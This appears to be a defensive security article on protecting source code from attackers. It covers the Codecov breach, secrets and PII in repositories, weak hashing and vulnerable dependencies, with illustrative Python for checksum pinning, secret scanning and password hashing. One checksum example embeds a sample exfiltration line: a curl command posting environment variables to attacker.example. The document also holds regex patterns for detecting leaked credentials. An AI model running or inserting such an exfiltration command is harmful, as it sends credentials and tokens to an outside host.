How to protect your source code from attackers

Mackenzie Jackson, Developer Advocate, GitGuardian

When people talk about writing secure code, they're generally referring to creating secure applications. This means writing code that doesn't create vulnerabilities when your application is running. 

But what about securing the source code itself, separate from the application? People often wrongly assume that, because source code is private, it is protected. But malicious actors know that gaining access to source code can not only guide them to vulnerabilities within the application—it can also expose other types of active threats.

All source code is unique. It can be the most valuable resource a company holds, but it is also, by nature, a very leaky asset. It is pushed into your version-control system, then cloned onto your developers' machines (personal and professional), forked into new projects, included in internal wikis, backed up on cloud drives, shared through messaging systems such as Slack, and even posted into public developer forums such as Stack Overflow.

In many version-control systems, code is never truly deleted. When a new version is uploaded, the previous version is often just hidden under a pile of old commits. Regardless of how or where your code sprawls, you have no visibility into where it might end up, no way to audit who has accessed or cloned it, and no way to know for sure that it is still secure. It is nearly impossible to prevent source code from leaking out of your organization.

Don't get the wrong idea. I am not saying that you need to have strict access control on source code and wrap it in multiple authentication layers. I'm saying that your source code and anything within it should be assumed to be vulnerable.

You may argue that everywhere code can sprawl is private, with layers of authentication, so even sprawled source code does not pose a security risk. This unfortunately is not true. Code repositories have become known as a valuable target for attackers because they contain lots of sensitive information, and attackers rely on this.

Recently we have seen a massive increase in attackers targeting private repositories. Here are some of the techniques attackers use—and what you can do to stop them.

Targeting repositories through supply chain attacks

A software supply chain attack happens when attackers manipulate the code in third-party software components in order to compromise the downstream applications that use them. There has been a dramatic rise in such attacks, and they change the economics of an attack: compromising one widely used component can open a path into every organization that depends on it.

A recent example is the April 2021 Codecov breach. It potentially exposed any credentials, tokens, or keys that Codecov's customers were passing through their CI runners and that were accessible when the Bash Uploader script was executed. It also potentially exposed any services, data stores, and application code that could be accessed with those credentials, tokens, or keys.

Attackers were able to compromise Codecov by using credentials found in a misconfigured Docker image. Using this credential, attackers accessed the private code repository of Codecov and inserted a malicious line of code. This line of code took credentials that were being used in the CI environment and sent them to the attacker directly. The breach remained undetected for months.
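One general defense against a tampered third-party script is to pin a checksum at review time and refuse to run anything that no longer matches. The sketch below is an illustration of that idea only, not a description of how Codecov or its customers responded; the script contents and the attacker URL are hypothetical placeholders.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of data as a lowercase hex string."""
    return hashlib.sha256(data).hexdigest()


def is_trusted(script: bytes, pinned_digest: str) -> bool:
    """Check a downloaded script against a digest recorded in advance."""
    # compare_digest performs a constant-time comparison.
    return hmac.compare_digest(sha256_hex(script), pinned_digest.lower())


# Hypothetical script contents standing in for a downloaded uploader script.
original = b"#!/bin/bash\necho 'upload coverage report'\n"

# Hypothetical tampering: one extra line that ships the environment elsewhere.
tampered = original + b"curl -s https://attacker.example/ -d \"$(env)\"\n"

# Digest recorded when the script was last reviewed (an assumption of this sketch).
pinned = sha256_hex(original)

if not is_trusted(tampered, pinned):
    print("Checksum mismatch: refusing to run the script")
```

A check like this only helps if the pinned digest is stored somewhere the attacker cannot also modify, such as your own repository rather than the vendor's download page.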

While the attackers gained access to a variety of potentially sensitive credentials, by analyzing the attack path, we can see what they were really after: credentials to private code repositories within Codecov and its 22,000 customers. We know this from the public responses of Codecov customers such as Rapid7, Twilio, Confluent, and Atlassian.

None of these companies reported any major data breach as a result of the incident, but they nevertheless took actions to shore up their security postures and alerted their customers.

Targeting internal messaging systems

A favorite playbook of attackers is to gain access to companies' internal messaging systems, such as Slack. This can be done in many different ways, including by using sophisticated phishing techniques or simply by buying an organization's session ID cookie on the black market.

Once in Slack, attackers can scan channels for sensitive information and source code or convince administrators to give them access to private systems. This is exactly what hackers did to access Electronic Arts' private codebase.

There are many more examples of source code being exposed via various attack techniques. The point is that source code, and the repositories in which it is stored, are not secure vaults and often create a weakness in a company's security posture.

Threats within source code

You may be familiar with the potential security threats within your applications—for instance, cross-site scripting or SQL injection—but what about the source code itself? Your source code can contain both active and passive threats.

Active threats are items that can be immediately used in an exploit. This includes secrets within the codebase such as API keys and credentials. Passive threats are those that can be used by an attacker to target weak areas of your application.

Active threats: Secrets and PII

Here are two examples of active threats.

Revealing secrets

Secrets are the most obvious example of an active threat. Secrets, or digital authentication credentials, include API keys, security certificates, database credentials, and anything else that provides access to systems and services.

We use secrets to authenticate ourselves and our systems with our applications, and we can have hundreds of secrets to manage. Think of all the services your applications might have, from SaaS tools to cloud infrastructure, alerting tools, and the dashboard.

All of these systems use secrets. These secrets are made to be used programmatically, and therefore commonly end up within source code. Also, the history may live forever in your version-control system, unless you rewrite it. Because of this, secrets may be buried in your history, hidden from you but easily uncovered by attackers who know what they are looking for.

Secrets are commonly found within repositories, sometimes through poor practices such as hardcoding secrets, sometimes through auto-generated files such as debug logs. They can be included in configuration files that are accidentally committed into the system. 
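To make this concrete, here is a minimal sketch of pattern-based scanning for hardcoded secrets. The three patterns and the function name find_secrets are illustrative assumptions, not the rule set of any particular tool; real detectors use far larger rule sets and validate their findings. The AWS key shown is the well-known documentation placeholder, not a live credential.

```python
import re

# Illustrative patterns only (assumptions of this sketch).
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_header": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"
    ),
    "generic_assignment": re.compile(
        r"(?:api_?key|secret|passw(?:or)?d|token)\w*\s*[:=]\s*['\"]([^'\"]{8,})['\"]",
        re.IGNORECASE,
    ),
}


def find_secrets(text: str) -> list[tuple[int, str]]:
    """Return (line number, pattern name) for every line that matches a pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, name))
    return findings


# Hypothetical configuration file that was committed by accident.
sample = "\n".join([
    "DEBUG = True",
    'aws_key = "AKIAIOSFODNN7EXAMPLE"',
    'db_password = "correct-horse-battery"',
    "timeout = 30",
])

for lineno, name in find_secrets(sample):
    print(f"line {lineno}: possible {name}")
```

Running the same scan over every historical version of a file, not just the current one, is what uncovers secrets buried in old commits.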

Exposing personally identifiable information

It is very common for PII to coexist with source code. This may be from a database dump or debug logs that have been captured and added into the repository. Once this data enters the same location as the source code, it is cloned and copied with it.

Not only can this be a threat to your users, but it can also have a huge impact on compliance. This is exactly the type of information discovered when the Indian government was breached earlier this year in a white-hat attack. This included MySQL dumps and even sensitive police reports that had entered the repositories' history.

Passive threats: Cryptography and app logic

Passive threats can be found in areas such as cryptography and business application logic.

Cryptography weaknesses

There can be many flaws in your cryptography, including exposing the encryption key, which would be considered a secret. But simply showing the method of encryption can also be a security threat. Cryptography tends to start out strong and gradually get weaker. Therefore, if you continually maintain support for old crypto, you're becoming less secure and trustworthy.

This means encryption methods must continually be improved over time. That being said, brute-forcing encrypted data is typically not the first step attackers take. This is because it is difficult, if not impossible, to determine from the encrypted data alone what encryption method has been used and whether it is even possible to decrypt it.

If, however, you are using weak encryption or encryption with known vulnerabilities, and this is written in your source code, then this can point an attacker directly to insecure data within your application. An example of this would be continuing to use the MD5 hashing algorithm despite a 2008 guidebook by CompTIA saying this method is extremely insecure. 
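As an illustration, assuming the hash in question protects stored passwords, the sketch below contrasts an unsalted MD5 digest with a salted, iterated key-derivation function from Python's standard library. The function names and the iteration count are assumptions of this sketch; choose a work factor that suits your own hardware and current guidance.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

ITERATIONS = 200_000  # assumed work factor for this sketch; tune for your environment


def weak_hash(password: str) -> str:
    """Unsalted MD5: fast to compute, so fast to guess. Shown only for contrast."""
    return hashlib.md5(password.encode()).hexdigest()


def strong_hash(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Derive a salted PBKDF2-HMAC-SHA256 digest; returns (salt, digest)."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    _, digest = strong_hash(password, salt)
    return hmac.compare_digest(digest, expected)


salt, stored = strong_hash("hunter2")
print(verify("hunter2", salt, stored))
```

An attacker who reads a call like weak_hash in your source knows immediately that precomputed tables and fast guessing will work against whatever that function protects.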

Problems with business application logic

Business logic vulnerabilities are flaws in the design and implementation of an application that allow an attacker to elicit unintended behavior. Unlike some of the other vulnerabilities listed, these types of flaws can be exploited from the running application, and an attacker does not need the source code to discover them.

Some examples of common business logic vulnerabilities are:

  • Putting excessive trust in client-side controls
  • Failing to handle unconventional input
  • Making flawed assumptions about user behavior

But in some cases, using the source code can dramatically help an attacker target specific areas of an application. Once attackers have access to your source code, they can map endpoints easily and uncover the assumptions the developers have made in how users will use your application.
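The first two items in the list above can be illustrated with a small sketch of a server-side order handler. Everything here is hypothetical: the CATALOG prices, the OrderRequest fields, and the quantity limit are assumptions chosen for the example. The point is that the server recomputes the total from its own data and rejects unconventional input, instead of trusting a value the client sent.

```python
from dataclasses import dataclass

# Hypothetical server-side catalog: the authoritative prices, in cents.
CATALOG = {"widget": 1999, "gadget": 4999}

MAX_QUANTITY = 100  # assumed business limit for this sketch


@dataclass
class OrderRequest:
    item: str
    quantity: int
    client_total_cents: int  # what the browser claims; never used for billing


def price_order(req: OrderRequest) -> int:
    """Return the amount to charge, computed only from server-side data."""
    if req.item not in CATALOG:
        raise ValueError("unknown item")
    # Reject zero, negative, and absurdly large quantities.
    if not 1 <= req.quantity <= MAX_QUANTITY:
        raise ValueError("quantity out of range")
    return CATALOG[req.item] * req.quantity


# A tampered request claiming two widgets cost one cent in total.
tampered = OrderRequest(item="widget", quantity=2, client_total_cents=1)
print(price_order(tampered))
```

With source code in hand, an attacker can see at a glance whether a handler uses a field like client_total_cents or ignores it, which is exactly the kind of developer assumption the paragraph above describes.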

Check your dependencies

In the vast majority of applications today, 90% of the code comes from open-source libraries, SaaS tools, and other external components. This means that hackers often know your code better than you do, because they study these components and know how to exploit them.

The first step an attacker might take in launching an attack against your application is to figure out which vulnerable dependencies it relies on. Tools such as Snyk have massive databases of known vulnerabilities in these components, and a simple scan can reveal which critical vulnerabilities affect the components your application is built on. It may even be possible to download a working exploit for the vulnerability from the Internet.

Of course, you can argue that a user can discover dependencies through a running application, but this is only true for what the user has access to. To get the most comprehensive list of vulnerabilities, you must have access to the application's source code. If attackers gain access to source code, they can produce a list of targets and exploits they can potentially run against your application.
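A rough sketch of how quickly a dependency manifest turns into a target list: the code below reads pinned versions from a requirements-style file and compares them with advisory data. The package names, versions, and the ADVISORIES table are all invented for illustration, and the version parser handles only simple dotted numbers; real scanners query maintained vulnerability databases.

```python
# Hypothetical advisory data: package name -> first version that contains the fix.
ADVISORIES = {"examplelib": "2.4.1", "otherlib": "1.0.0"}


def parse_version(version: str) -> tuple[int, ...]:
    """Parse a simple dotted numeric version such as '2.4.1'."""
    return tuple(int(part) for part in version.split("."))


def parse_requirements(text: str) -> dict[str, str]:
    """Collect 'name==version' pins, ignoring comments and unpinned lines."""
    pins = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if "==" in line:
            name, version = line.split("==", 1)
            pins[name.strip().lower()] = version.strip()
    return pins


def vulnerable_pins(pins: dict[str, str]) -> list[str]:
    """Return the packages pinned below the first fixed version."""
    return sorted(
        name
        for name, version in pins.items()
        if name in ADVISORIES
        and parse_version(version) < parse_version(ADVISORIES[name])
    )


# Hypothetical manifest recovered from a leaked repository.
sample = "examplelib==2.3.0\notherlib==1.2.0  # already patched\nunpinned\n"
print(vulnerable_pins(parse_requirements(sample)))
```

Running the same kind of check yourself, before an attacker does, is the defensive use of the technique.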

Preventing insecure source code

There is no silver bullet in security, and insecure source code is no exception. Once we can all agree that source code is a leaky asset and that anything inside it will eventually be exposed, we can start to take appropriate actions to prevent vulnerabilities from entering source code.

Code reviews

Protecting source code comes down to education, code reviews, tools, and knowing where to spend your energy. A 2015 AppSec USA survey showed which vulnerabilities were most frequently picked up by automated tools and which were most commonly missed. The most commonly missed were "Insecure Direct Object Reference," "Sensitive Data Exposure," and "Missing Access Control."

This gives a great indication of which vulnerabilities you need to spend your time looking for in manual processes such as code reviews and which can be reliably caught by automated tools. A great way to get started is with the OWASP Code Review Guide (PDF), a free resource from the Open Web Application Security Project.

Automated secrets detection

Secrets are among the most sensitive vulnerabilities that can be exposed in your code, the crown jewels of your organization that can provide access to the most valuable information and systems.

Attackers using credentials can be particularly harmful because, once properly authenticated, they can remain undetected for extended periods of time, moving laterally through systems, elevating privileges, and collecting information. It is vital to implement automated secrets detection using a dedicated tool.
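Dedicated tools combine several techniques. One common idea is to flag strings that look random, since generated keys tend to have higher character entropy than ordinary identifiers. The sketch below shows that single heuristic; the threshold and minimum length are assumed values for illustration, not settings taken from any specific product, and a heuristic like this produces false positives on its own.

```python
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Return the Shannon entropy of text in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_like_secret(token: str, threshold: float = 3.5, min_length: int = 20) -> bool:
    """Flag long, high-entropy strings as candidate secrets (assumed cutoffs)."""
    return len(token) >= min_length and shannon_entropy(token) >= threshold


# Hypothetical tokens pulled from a source file.
candidates = ["q8Zr2LxV9mKp4TnW7bYc", "a" * 24, "the_quick_brown_fox"]
for token in candidates:
    print(token, looks_like_secret(token))
```

In practice a check like this would run automatically, for example on every commit, so that a candidate secret is caught before it ever reaches the shared repository.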


Too often, security is left to a limited department of security experts, but there is a lot that developers can and should share responsibility for. DevSecOps is the concept of bringing developers into the security process early. Arguably, no one is more connected to the source code than developers, so it makes sense that they share some of the responsibility in making sure it is secure.

This means not only that fewer vulnerabilities are introduced into the source code, but also that many others are picked up sooner, reducing the cost of remediation. While this does not mean you can remove the security team altogether, it does mean that you can increase security coverage throughout the entire software development lifecycle.

Know what can be prevented and where to focus

Source code is a valuable but very leaky asset. However, wrapping it in heavy layers of authentication will only slow down the development process.

While you may not have control over source code leaking, you do have control over the vulnerabilities that your source code can expose. These can include active threats such as leaked secrets and PII, or passive threats such as cryptography weakness, business/application logic flaws, and vulnerable dependencies.

The key to protecting against these threats is to understand what can be prevented using tools and what you need to focus on in code reviews. Ultimately, protecting source code will require a shared responsibility model among the security team, operations teams, and the developers themselves.

In the end, all organizations should strive to have source code that can be open-sourced at any moment without introducing any additional security bugs.
